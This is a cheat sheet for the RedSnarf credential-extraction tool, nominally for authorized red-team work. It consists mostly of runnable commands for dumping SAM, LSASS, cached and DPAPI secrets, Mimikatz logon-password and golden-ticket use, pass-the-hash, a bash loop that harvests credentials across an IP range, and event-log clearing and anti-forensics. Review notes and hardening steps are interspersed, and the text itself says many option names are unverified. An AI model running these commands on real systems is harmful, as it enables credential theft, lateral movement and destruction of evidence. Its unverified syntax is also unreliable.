
RedSnarf

RedSnarf (nccgroup) is a red-team tool for extracting credentials and other secrets from Windows hosts: cached domain credentials, the SAM database, LSASS memory and other Windows credential stores. It is for authorized penetration tests, red-team engagements and security assessments only, within the scope of a written authorization, and it needs local administrator or SYSTEM privileges on each target. Two practical caveats for this page: the option names shown below have not all been verified against the upstream tool's `--help` (check them before relying on them), and every output file it writes is as sensitive as the password database it came from — give it restrictive permissions, keep it on encrypted storage and destroy it at the end of the engagement.

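# Python 3.6+ (check the upstream README for the interpreter version it actually targets)
python3 --version

# Build prerequisites for the Python dependencies
sudo apt-get install python3-pip python3-dev

# On Windows: Install Visual C++ build tools
# Download: https://visualstudio.microsoft.com/visual-cpp-build-tools/

# Supply chain: this tool will be run with admin/SYSTEM credentials against client systems.
# Clone from the upstream repository only, record the exact revision you reviewed, and
# install the dependencies into a virtualenv rather than the system interpreter.
git clone https://github.com/nccgroup/redsnarf.git
cd redsnarf
git log -1 --format='%H %cd'            # note the commit in the engagement log
python3 -m venv .venv && . .venv/bin/activate
pip3 install -r requirements.txt

# Distribution package (Kali ships one; plain Debian/Ubuntu repositories may not)
sudo apt-get install redsnarf

# Verify the install
python3 redsnarf.py --help
redsnarf --version
command -v redsnarf

# Basic syntax. NOTE(review): -h is "help" in most CLIs and upstream appears to use -H for
# the target host — confirm the host switch with --help before scripting around it.
python3 redsnarf.py [options] <target>
redsnarf --help
redsnarf --version
redsnarf -h <target> -u <username> -p <password> -d <domain>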
| Option | Purpose |
| --- | --- |
| `-h <target>` | Target host (note: `-h` is *help* in many CLIs; confirm the host switch with `--help`) |
| `-u <username>` | Username for authentication |
| `-p <password>` | Password for authentication (visible to other local users via `ps`; prefer a hash or prompt where the tool supports it) |
| `-d <domain>` | Domain name |
| `-L` | Local system extraction |
| `-R` | Remote system extraction |
| `--sam` | Extract the SAM database |
| `--lsass` | Dump LSASS memory |
| `--registry` | Extract from the registry |
| `--mimikatz` | Run Mimikatz commands |
| `--hash` | Extract password hashes |
| `--cached` | Dump cached domain credentials |
| `-o <output>` | Output file (the examples below use `--output`; confirm which spelling this version accepts) |
| `-v` | Verbose output |
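# Output files hold password hashes: make them owner-readable only before anything is written
umask 077

# Extract local SAM database (requires SYSTEM privileges)
python3 redsnarf.py -L --sam --output local_hashes.txt

# Dump LSASS process memory for credential extraction.
# NOTE(review): opening LSASS is the single most-monitored action on a modern endpoint
# (EDR, Credential Guard, RunAsPPL); expect detection and agree with the client beforehand.
python3 redsnarf.py -L --lsass --output lsass_dump.txt

# Extract cached domain credentials from registry (DCC2/mscash2 — slow to crack, but still secrets)
python3 redsnarf.py -L --cached --output cached_creds.txt

# Extract SAM from remote host.
# The password on the command line is visible in `ps` and shell history on the attacker box;
# keep the operator host single-user or supply the secret via the tool's prompt/hash option.
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Administrator \
  -p MyPassword123 \
  -d DOMAIN \
  --sam --output remote_hashes.txt

# Extract from all available sources into one file
python3 redsnarf.py \
  -L \
  --sam \
  --lsass \
  --cached \
  --registry \
  --output all_creds.txt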
# Access Windows registry for stored credentials
# NOTE(review): --hive, --key and --vpn are not in the option table above — confirm they exist
# in this redsnarf version with --help before relying on them.
python3 redsnarf.py \
  -L \
  --registry \
  --hive SAM \
  --output registry_creds.txt
# Extract from remote registry via RDP/SMB
# NOTE(review): remote registry access runs over SMB (the RemoteRegistry service / \winreg pipe
# must be reachable); RDP plays no part in it.
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --registry \
  --remote
# Extract stored AutoLogon credentials
# NOTE(review): if AutoAdminLogon is set, DefaultPassword under this key is stored in clear
# text — report it as a finding in its own right. The backslashes survive inside double quotes
# in bash (\S, \M, \W, \C are not escape sequences), but single quotes are the safer habit.
python3 redsnarf.py \
  -L \
  --registry \
  --key "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" \
  --output autologon.txt
# Extract stored VPN credentials from registry
python3 redsnarf.py -L --registry --vpn --output vpn_creds.txt
# Dump all password hashes from SAM
# NOTE(review): --format and --analyze are not in the option table above — confirm with --help.
python3 redsnarf.py -L --hash --output hashes.txt
# Extract NTLM hashes for cracking (hashcat mode 1000; the NT hash is also directly usable
# for pass-the-hash, so treat this file as equivalent to the plaintext passwords)
python3 redsnarf.py \
  -L \
  --hash \
  --format ntlm \
  --output ntlm_hashes.txt
# Extract legacy LM hashes (if available)
# LM hashes are only present where NoLMHash is disabled (pre-Vista defaults); their presence
# is itself a finding, as LM is trivially crackable.
python3 redsnarf.py -L --hash --format lm --output lm_hashes.txt
# Extract and analyze hashes
python3 redsnarf.py \
  -L \
  --hash \
  --analyze \
  --output hash_analysis.txt
# Execute Mimikatz commands through redsnarf
# NOTE(review): running Mimikatz remotely generally means staging a binary or script on the
# target; assume AV/EDR will flag it and that the artifact must be removed at cleanup.
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --mimikatz \
  --command "sekurlsa::logonpasswords" \
  --output mimikatz_output.txt
# Dump all credentials using Mimikatz
python3 redsnarf.py \
  -L \
  --mimikatz \
  --full \
  --output credentials_full.txt
# Use Mimikatz to create golden ticket
# NOTE(review): kerberos::golden also needs the krbtgt NT hash (/krbtgt:) and the real domain
# SID (the /sid: below is a placeholder). A golden ticket is persistence that outlives the
# engagement: it stays valid until the client resets the krbtgt password twice. Only forge
# one with explicit written authorization, record it, and put the double krbtgt reset in the
# remediation plan. This example also names no host/-L — confirm how the tool targets it.
python3 redsnarf.py \
  --mimikatz \
  --command "kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-..." \
  --output golden_ticket.txt
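# Extract credentials from remote Windows system.
# DOMAIN\user must be quoted: an unquoted backslash is an escape in bash, so
# `-u domain\administrator` reaches the tool as `domainadministrator` and the logon fails.
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u 'domain\administrator' \
  -p MyPassword123 \
  --remote \
  --lsass \
  --output remote_creds.txt

# Use SMB protocol for credential extraction
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --smb \
  --remote \
  --sam

# Execute a command via WMI (Windows Management Instrumentation).
# "Get-Process lsass" is a PowerShell cmdlet: it only lists the process, it extracts nothing,
# and the remote PowerShell invocation is logged (4688 / script block logging) if enabled.
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --wmi \
  --command "Get-Process lsass"

# Extract credentials from RDP sessions
# NOTE(review): --rdp/--extract-sessions are not in the option table above — confirm with --help.
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --rdp \
  --extract-sessions \
  --output rdp_sessions.txt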
# Check current privilege level
python3 redsnarf.py -L --check-privs
# Leverage token impersonation for escalation
# NOTE(review): impersonating SYSTEM from a non-SYSTEM context needs SeImpersonatePrivilege or
# SeDebugPrivilege; --impersonate/--target are not in the option table — confirm with --help.
python3 redsnarf.py \
  -L \
  --impersonate \
  --target SYSTEM \
  --output impersonation_result.txt
# Extract service account credentials
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --service-accounts \
  --output service_creds.txt
# Extract from Group Policy Preferences (GPP)
# NOTE(review): GPP passwords (cpassword in SYSVOL\...\Groups.xml etc.) are decryptable with the
# published AES key (MS14-025). They live on the domain controllers' SYSVOL share, so a purely
# local (-L) run presumably reads a cached copy — verify what this mode actually reads.
python3 redsnarf.py \
  -L \
  --gpp \
  --output gpp_creds.txt
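# Create target list: one host per line, fields "host user password domain".
# This file holds plaintext passwords — chmod 600, keep it off shared storage, shred it afterwards.
cat targets.txt
# 192.168.1.100 Administrator Pass123 DOMAIN
# 192.168.1.101 Admin Pass456 DOMAIN
# 192.168.1.102 User789 Pass789 DOMAIN

# Process all targets.
# read -r keeps backslashes (DOMAIN\user) intact; the </dev/null on the inner command stops
# redsnarf from swallowing the remaining lines of targets.txt through the loop's stdin.
# Blank and '#' lines are skipped. The password is still visible to other local users via
# `ps` for the duration of each run; prefer a hash or prompt if the tool supports it.
while read -r host user pass domain; do
  [[ -z "$host" || "$host" == \#* ]] && continue
  python3 redsnarf.py -h "$host" -u "$user" -p "$pass" -d "$domain" \
    --sam --output "${host}_hashes.txt" </dev/null
done < targets.txt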
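#!/bin/bash
# Harvest credentials from a range of hosts.
# Before running: confirm every address in the range is in scope, and check the lockout
# policy. One failed logon per host is harmless for a *local* account (the counter is per
# host), but if Administrator is a *domain* account these 51 parallel attempts hit the DC's
# single counter and can lock it out. "password" is a placeholder, not a spray list.
set -u

# Per-host time limit. 5 s only bounds unresponsive hosts — a real SAM dump over SMB takes
# longer, so raise it (PER_HOST_TIMEOUT=60 ./harvest.sh) once the target set is confirmed.
per_host_timeout=${PER_HOST_TIMEOUT:-5}

for ip in 192.168.1.{50..100}; do
  # Run the tool directly under timeout; the extra bash -c wrapper added nothing but a
  # string-interpolated command line.
  timeout "$per_host_timeout" python3 redsnarf.py -h "$ip" -u Administrator -p password --sam &
done
wait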
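#!/bin/bash
# Combine all extracted credentials.
# Aggregates go to a separate directory so a rerun does not read its own output back in,
# and are created owner-only: these files are the most sensitive artifacts of the engagement.
set -euo pipefail
umask 077
mkdir -p aggregated
grep -hE "admin|root|pass" -- *.txt > aggregated/all_creds_combined.txt
sort -u aggregated/all_creds_combined.txt > aggregated/unique_creds.txt

# Extract usernames and hashes.
# Assumes secretsdump-style lines, user:rid:LM:NT[:::] — confirm against the tool's output.
# -i because hex hashes are usually emitted in lowercase; the optional ':::' accepts both forms.
python3 redsnarf.py -L --sam --output hashes.txt
grep -ioE "^[^:]+:[^:]+:[a-f0-9]{32}:[a-f0-9]{32}(:::)?$" hashes.txt

# Convert hashes for use with Hashcat (NT hash = 4th colon field; hashcat mode 1000).
# The filter drops header/blank lines that would otherwise produce empty or junk entries.
python3 redsnarf.py -L --hash --output hashes.txt
awk -F: 'NF >= 4 && $4 ~ /^[A-Fa-f0-9]{32}$/ { print $4 }' hashes.txt > hashcat_ntlm.txt

# Remove duplicate credentials
sort -u all_credentials.txt > unique_credentials.txt

# Search for plaintext credentials
grep -iE "password|pass|pwd|creds" extracted_output.txt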
# Dump and parse process memory
# NOTE(review): an LSASS dump contains every logged-on user's secrets (NT hashes, Kerberos
# keys, sometimes plaintext). Treat lsass_memory.bin exactly like a hash file: owner-only
# permissions, encrypted at rest, never left on the target, shredded after parsing.
python3 redsnarf.py \
  -L \
  --memory-dump \
  --process lsass \
  --output lsass_memory.bin

# Parse the dump (offline, on the operator host — no need to touch the target again)
python3 redsnarf.py --parse-dump lsass_memory.bin --output parsed.txt
# Extract Kerberos tickets from memory
# NOTE(review): exported TGTs are live credentials until they expire (default 10 h, renewable
# 7 days); list them in the report so the client can force renewal/password changes.
python3 redsnarf.py \
  -L \
  --kerberos \
  --extract-tickets \
  --output tickets.txt
# Extract DPAPI-encrypted credentials
# NOTE(review): DPAPI blobs only decrypt with the owning user's master key (their password or
# the domain backup key) — check what --decrypt actually uses in this version.
python3 redsnarf.py \
  -L \
  --dpapi \
  --decrypt \
  --output dpapi_decrypted.txt
# Extract Windows Credential Manager credentials
python3 redsnarf.py \
  -L \
  --credential-manager \
  --output credential_manager.txt
# Extract credentials for lateral movement
# NOTE(review): --extract-all and --lateral-movement-prep are not in the option table — confirm.
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --extract-all \
  --lateral-movement-prep \
  --output lateral_creds.txt
# Extract data for establishing persistence
# NOTE(review): anything created for persistence (AutoLogon entries, scheduled tasks) must be
# inventoried at the time it is created and removed at cleanup; it is a liability for the
# client if forgotten. Check the RoE allows persistence at all.
python3 redsnarf.py \
  -L \
  --persistence \
  --auto-logon \
  --scheduled-task \
  --output persistence_creds.txt
# Extract domain information
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --domain-enum \
  --output domain_info.txt
# Minimize detection risk
# NOTE(review): --quiet/--no-logging reduce the tool's *own* output; they do nothing about the
# Windows-side telemetry (LSASS handle opens, 4624/4672 logons, service creation) that EDR
# and SIEM rules key on. Do not mistake this for stealth.
python3 redsnarf.py \
  -L \
  --quiet \
  --no-logging \
  --minimal-output \
  --output creds.txt
# Clear event logs post-extraction
# NOTE(review): do not run this unless the rules of engagement explicitly permit log clearing.
# It destroys the client's own evidence of what happened, it is itself logged (Security
# Event ID 1102 "The audit log was cleared", System 104) and it does nothing against logs
# already forwarded to a collector/SIEM — so it is both destructive and a loud detection.
python3 redsnarf.py \
  -L \
  --cleanup \
  --clear-logs \
  --log-type Security,System
# Minimize forensic artifacts
# NOTE(review): same objection as above — timestomping and artifact removal on client systems
# are anti-forensics, not assessment activity. Agreed cleanup is removing *your* tooling and
# dump files, not erasing the system's record of the engagement.
python3 redsnarf.py \
  -L \
  --anti-forensics \
  --clear-timestamps \
  --remove-artifacts
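# Requires SYSTEM privileges on the Windows target.
# NOTE(review): sudo only raises privileges on the Linux operator host; it cannot grant SYSTEM
# on a remote Windows box. Presumably -L here reads hive/dump files already copied locally —
# confirm what "local" means for this tool before leaning on this line.
sudo python3 redsnarf.py -L --sam

# Or use credentials with sufficient privileges.
# DOMAIN\Administrator must be single-quoted: an unquoted backslash is a bash escape and the
# tool would receive `DOMAINAdministrator`.
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u 'DOMAIN\Administrator' \
  -p MyPassword123 \
  --sam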
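# Verify network connectivity. ICMP is often filtered; reachability of TCP/445 is the
# signal that actually matters for SMB-based extraction.
ping -c 3 192.168.1.100
nc -zvw3 192.168.1.100 445

# Test SMB access. Never put the password after '%' on the command line: it is visible to
# every local user in `ps`, lands in shell history and in any command auditing on the box.
# Let smbclient prompt for it, or use a credentials file with mode 600.
smbclient -L 192.168.1.100 -U Administrator
# smbclient -L 192.168.1.100 -A ~/.smbauth    # file with username=/password=/domain= lines, chmod 600

# Check firewall / existing sessions from this host (ss replaces the deprecated netstat).
# An established session listed here proves the path is open; an absent one proves nothing —
# use the port probe above for that.
ss -tn state established

# Verify Mimikatz availability (command -v is the POSIX way; `which` is not portable)
command -v mimikatz

# Check Python dependencies
pip3 list | grep -i mimic

# Reinstall requirements (inside the venv, so the system interpreter stays untouched)
pip3 install -r requirements.txt --upgrade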
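# Encrypt output file, then destroy the plaintext.
# gpg --symmetric writes creds.txt.asc and leaves creds.txt in place, so without the shred the
# "encrypted" credentials are still sitting next to it in the clear.
umask 077
python3 redsnarf.py -L --sam --output creds.txt
gpg --symmetric --cipher-algo AES256 --armor creds.txt
# shred is only reliable on plain block devices: on SSDs, CoW and journaling filesystems the
# data may survive, so keep the working directory on an encrypted volume as well.
shred -u creds.txt

# Store in structured format.
# A SQLite file is no safer than a text file: same owner-only permissions, same encrypt-and-shred
# handling at the end of the engagement.
python3 redsnarf.py \
  -L \
  --sam \
  --database credentials.db \
  --format sqlite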
# Phase 1: Local system extraction
python3 redsnarf.py -L --extract-all --output local_system.txt

# Phase 2: Remote extraction
for host in $(cat internal_hosts.txt); do
  python3 redsnarf.py -h "$host" -u Admin -p Pass123 \
    --remote --lsass --output "${host}.txt"
done

# Phase 3: Credential aggregation
cat *.txt | grep -oE '[A-F0-9]{32}:[A-F0-9]{32}' > all_hashes.txt
# Extract domain credentials
python3 redsnarf.py \
  -h domain-controller \
  -u Administrator \
  -p DomainPassword \
  -d DOMAIN \
  --sam --lsass --cached \
  --output domain_dump.txt
# Extract local admin
python3 redsnarf.py -L --hash --output local_hashes.txt

# Use hash to access remote system
python3 redsnarf.py \
  -h 192.168.1.101 \
  -u Administrator \
  -p <NTLM_HASH> \
  --pass-the-hash \
  --extract-all
  1. Obtain Authorization - Use the tool only on systems named in a written authorization and rules of engagement (RoE) that list the hosts, accounts and techniques in scope
  2. Enable Logging - Keep a timestamped operator log (commands, targets, output files) for the report and for legal defensibility
  3. Minimize Exposure - Dump only what the objective requires, and move extracted material off the target promptly
  4. Secure Credentials - Protect extracted data at rest (owner-only permissions, encrypted volume or GPG) and in transit; shred plaintext copies once encrypted
  5. Documentation - Record every system accessed and every credential extracted so the client can rotate each one
  6. Clean Up - Remove tooling, dump files and any persistence you introduced (including forged Kerberos tickets) at the end of the assessment; clear event logs only if the RoE explicitly allows it — log clearing destroys the client's evidence and is itself logged (Security Event ID 1102)
  7. Chain of Custody - Maintain an evidence chain (hashes of dump files, who handled them, when) in case the material is needed in proceedings
  8. Incident Response - Agree a remediation plan in advance: every extracted credential must be rotated after the engagement, including a double krbtgt reset if a golden ticket was created
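# Disable the built-in local Administrator (RID 500). Do this only once another managed local
# admin exists (e.g. LAPS-managed), or the host becomes unrecoverable without physical access.
net user Administrator /active:no

# Require strong passwords. /minpwlen is a valid `net accounts` switch; /complexity is not —
# "Password must meet complexity requirements" is set through Group Policy or secedit
# (Account Policies > Password Policy), not from `net accounts`.
net accounts /minpwlen:14

# Enable LSASS protection (RunAsPPL). Set-ProcessMitigation takes -Name, not -PolicyName, and
# "ParentImageLoadAudit" does not appear among its mitigations as far as I can tell — and
# none of them stops a memory read of LSASS. RunAsPPL does: it blocks non-protected processes
# (Mimikatz, procdump, this tool) from opening LSASS for read. Needs a reboot; check that every
# LSA plugin/driver on the host is signed appropriately before enabling fleet-wide.
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" `
  -Name "RunAsPPL" -Value 1 -PropertyType DWORD -Force
# Defender's ASR rule "Block credential stealing from the Windows local security authority
# subsystem (lsass.exe)" adds a second, independent layer on top of PPL.

# Enable Windows Defender Credential Guard. Requires VBS (Hyper-V, UEFI, Secure Boot, TPM
# recommended) and a reboot; VBS must be switched on as well or LsaCfgFlags does nothing.
# LsaCfgFlags: 1 = enabled with UEFI lock (cannot be disabled remotely), 2 = enabled without lock.
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" `
  -Name "EnableVirtualizationBasedSecurity" -Value 1 -PropertyType DWORD -Force
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" `
  -Name "LsaCfgFlags" -Value 1 -PropertyType DWORD -Force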